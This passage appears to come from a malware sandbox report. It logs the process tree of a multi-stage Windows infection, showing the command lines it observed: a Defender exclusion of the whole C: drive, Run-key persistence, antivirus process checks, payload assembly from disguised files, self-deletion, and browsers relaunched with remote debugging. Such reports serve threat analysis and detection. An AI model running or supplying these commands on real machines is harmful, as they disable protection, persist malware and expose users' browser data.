        "C:\Users\Admin\AppData\Local\Temp\10352530101\amnew.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4512
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        7⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5580
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3420
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:5600
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4968
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5916
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:6092
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        
        PID:6120
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc77d2dcf8,0x7ffc77d2dd04,0x7ffc77d2dd10
        11⤵
        
        PID:4776
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,13553607700426558003,9116576002425853243,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2060 /prefetch:3
        11⤵
        
        PID:5924
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1948,i,13553607700426558003,9116576002425853243,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1992 /prefetch:2
        11⤵
        
        PID:5160
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2404,i,13553607700426558003,9116576002425853243,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2380 /prefetch:8
        11⤵
        
        PID:4804
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3168,i,13553607700426558003,9116576002425853243,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3176 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:3064
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3136,i,13553607700426558003,9116576002425853243,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3148 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:5304
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,13553607700426558003,9116576002425853243,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4292 /prefetch:2
        11⤵
        Uses browser remote debugging
        
        PID:4468
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4572,i,13553607700426558003,9116576002425853243,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4576 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:2332
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5176,i,13553607700426558003,9116576002425853243,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5184 /prefetch:8
        11⤵
        
        PID:4720
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        
        PID:6612
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc77d2dcf8,0x7ffc77d2dd04,0x7ffc77d2dd10
        11⤵
        
        PID:6692
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2056,i,4141065151885820983,17896104341463613648,262144 --variations-seed-version --mojo-platform-channel-handle=2052 /prefetch:2
        11⤵
        
        PID:5620
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1948,i,4141065151885820983,17896104341463613648,262144 --variations-seed-version --mojo-platform-channel-handle=2068 /prefetch:3
        11⤵
        
        PID:1788
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2396,i,4141065151885820983,17896104341463613648,262144 --variations-seed-version --mojo-platform-channel-handle=2392 /prefetch:8
        11⤵
        
        PID:7220
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3104,i,4141065151885820983,17896104341463613648,262144 --variations-seed-version --mojo-platform-channel-handle=3120 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:7348
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3060,i,4141065151885820983,17896104341463613648,262144 --variations-seed-version --mojo-platform-channel-handle=3084 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:7364
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4352,i,4141065151885820983,17896104341463613648,262144 --variations-seed-version --mojo-platform-channel-handle=4300 /prefetch:2
        11⤵
        Uses browser remote debugging
        
        PID:7628
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4660,i,4141065151885820983,17896104341463613648,262144 --variations-seed-version --mojo-platform-channel-handle=4692 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:7948
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4928,i,4141065151885820983,17896104341463613648,262144 --variations-seed-version --mojo-platform-channel-handle=4940 /prefetch:8
        11⤵
        
        PID:10136
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        
        PID:8104
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x244,0x248,0x24c,0x240,0x250,0x7ffc79c8f208,0x7ffc79c8f214,0x7ffc79c8f220
        11⤵
        
        PID:4796
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1956,i,3508783349758440635,5739814493930428092,262144 --variations-seed-version --mojo-platform-channel-handle=1952 /prefetch:2
        11⤵
        
        PID:8964
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2124,i,3508783349758440635,5739814493930428092,262144 --variations-seed-version --mojo-platform-channel-handle=1952 /prefetch:3
        11⤵
        
        PID:8988
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1900,i,3508783349758440635,5739814493930428092,262144 --variations-seed-version --mojo-platform-channel-handle=2580 /prefetch:8
        11⤵
        
        PID:9168
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3584,i,3508783349758440635,5739814493930428092,262144 --variations-seed-version --mojo-platform-channel-handle=3624 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:9908
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3592,i,3508783349758440635,5739814493930428092,262144 --variations-seed-version --mojo-platform-channel-handle=3668 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:9924
        
        C:\ProgramData\srq16pzmy5.exe
        
        "C:\ProgramData\srq16pzmy5.exe"
        10⤵
        
        PID:1904
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:3088
        
        C:\ProgramData\2vs0h4ohdt.exe
        
        "C:\ProgramData\2vs0h4ohdt.exe"
        10⤵
        
        PID:7152
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:11376
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:11428
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        12⤵
        Uses browser remote debugging
        
        PID:24436
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x40,0x11c,0x120,0xf8,0x124,0x7ffc7984dcf8,0x7ffc7984dd04,0x7ffc7984dd10
        13⤵
        
        PID:24464
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 11428 -s 980
        12⤵
        Program crash
        
        PID:24560
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 11428 -s 1280
        12⤵
        Program crash
        
        PID:24712
        
        C:\ProgramData\gv3w4e37yc.exe
        
        "C:\ProgramData\gv3w4e37yc.exe"
        10⤵
        
        PID:11620
        
        C:\Users\Admin\AppData\Local\Temp\DX2xNmGI\HMraR8pCMpN9kYXC.exe
        
        C:\Users\Admin\AppData\Local\Temp\DX2xNmGI\HMraR8pCMpN9kYXC.exe 0
        11⤵
        
        PID:11668
        
        C:\Users\Admin\AppData\Local\Temp\DX2xNmGI\FWKkePjETexVEgM8.exe
        
        C:\Users\Admin\AppData\Local\Temp\DX2xNmGI\FWKkePjETexVEgM8.exe 11668
        12⤵
        
        PID:11712
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 11712 -s 764
        13⤵
        Program crash
        
        PID:9212
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 11668 -s 708
        12⤵
        Program crash
        
        PID:18328
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\aasr1" & exit
        10⤵
        
        PID:9160
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        11⤵
        Delays execution with timeout.exe
        
        PID:3508
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
        8⤵
        
        PID:2680
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\10041590101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041590101\crypted.exe"
        8⤵
        
        PID:4776
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:5320
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        
        PID:1564
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffc77d2dcf8,0x7ffc77d2dd04,0x7ffc77d2dd10
        11⤵
        
        PID:3748
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\please18.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\please18.exe"
        8⤵
        
        PID:5484
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 6 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "key" /t REG_SZ /d "C:\Users\Admin\AppData\Local\key.exe"
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6080
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 6
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:3920
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "key" /t REG_SZ /d "C:\Users\Admin\AppData\Local\key.exe"
        10⤵
        
        PID:5284
        
        C:\Windows\SysWOW64\cmd.exe
        
        "cmd" /c ping 127.0.0.1 -n 12 > nul && copy "C:\Users\Admin\AppData\Local\Temp\10041600101\please18.exe" "C:\Users\Admin\AppData\Local\key.exe" && ping 127.0.0.1 -n 12 > nul && "C:\Users\Admin\AppData\Local\key.exe"
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5816
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 12
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1456
        
        C:\Users\Admin\AppData\Local\Temp\10041870101\b7eb62727f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041870101\b7eb62727f.exe"
        8⤵
        
        PID:4796
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041870101\b7eb62727f.exe"
        9⤵
        
        PID:4988
        
        C:\Users\Admin\AppData\Local\Temp\10041880101\96be28625f.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041880101\96be28625f.exe"
        8⤵
        
        PID:1144
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041880101\96be28625f.exe"
        9⤵
        
        PID:10556
      - C:\Users\Admin\AppData\Local\Temp\10352660101\2cccccb164.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10352660101\2cccccb164.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1416
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10352660101\2cccccb164.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4248
      - C:\Users\Admin\AppData\Local\Temp\10352670101\cde2c327ff.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10352670101\cde2c327ff.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4516
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10352670101\cde2c327ff.exe"
        7⤵
        
        PID:4596
      - C:\Users\Admin\AppData\Local\Temp\10352680101\9fef19f338.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10352680101\9fef19f338.exe"
        6⤵
        
        PID:2312
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:3024
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:4560
      - C:\Users\Admin\AppData\Local\Temp\10352690101\7b35p_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10352690101\7b35p_003.exe"
        6⤵
        
        PID:5336
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:5368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5092
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        
        PID:736
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        
        PID:1708
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        
        PID:4836
        
        C:\Users\Admin\AppData\Local\Temp\{da3a20a6-ff9b-42bc-b186-f034e65f2685}\26ba1283.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{da3a20a6-ff9b-42bc-b186-f034e65f2685}\26ba1283.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        
        PID:6024
        
        C:\Users\Admin\AppData\Local\Temp\{dee9e515-5654-4659-8891-0be7338b8be1}\28957015.exe
        
        C:/Users/Admin/AppData/Local/Temp/{dee9e515-5654-4659-8891-0be7338b8be1}/\28957015.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        10⤵
        
        PID:8108
      - C:\Users\Admin\AppData\Local\Temp\10352700101\EPTwCQd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10352700101\EPTwCQd.exe"
        6⤵
        
        PID:1920
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:4476
      - C:\Users\Admin\AppData\Local\Temp\10352710101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10352710101\7IIl2eE.exe"
        6⤵
        
        PID:6620
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        
        PID:7024
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:2756
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        
        PID:4944
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:8604
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        
        PID:8616
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        8⤵
        
        PID:13084
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        8⤵
        
        PID:13148
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        8⤵
        
        PID:2852
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        8⤵
        
        PID:6528
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        8⤵
        
        PID:1736
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        8⤵
        
        PID:5868
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        
        PID:8268
      - C:\Users\Admin\AppData\Local\Temp\10352720101\TbV75ZR.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10352720101\TbV75ZR.exe"
        6⤵
        
        PID:7884
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Minneapolis.mid Minneapolis.mid.bat & Minneapolis.mid.bat
        7⤵
        
        PID:2380
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:7536
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        
        PID:7556
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:8168
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        
        PID:8184
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 163531
        8⤵
        
        PID:8328
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Uses.mid
        8⤵
        
        PID:8800
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Hose" Pizza
        8⤵
        
        PID:11636
        
        C:\Windows\SysWOW64\cmd.exe
        
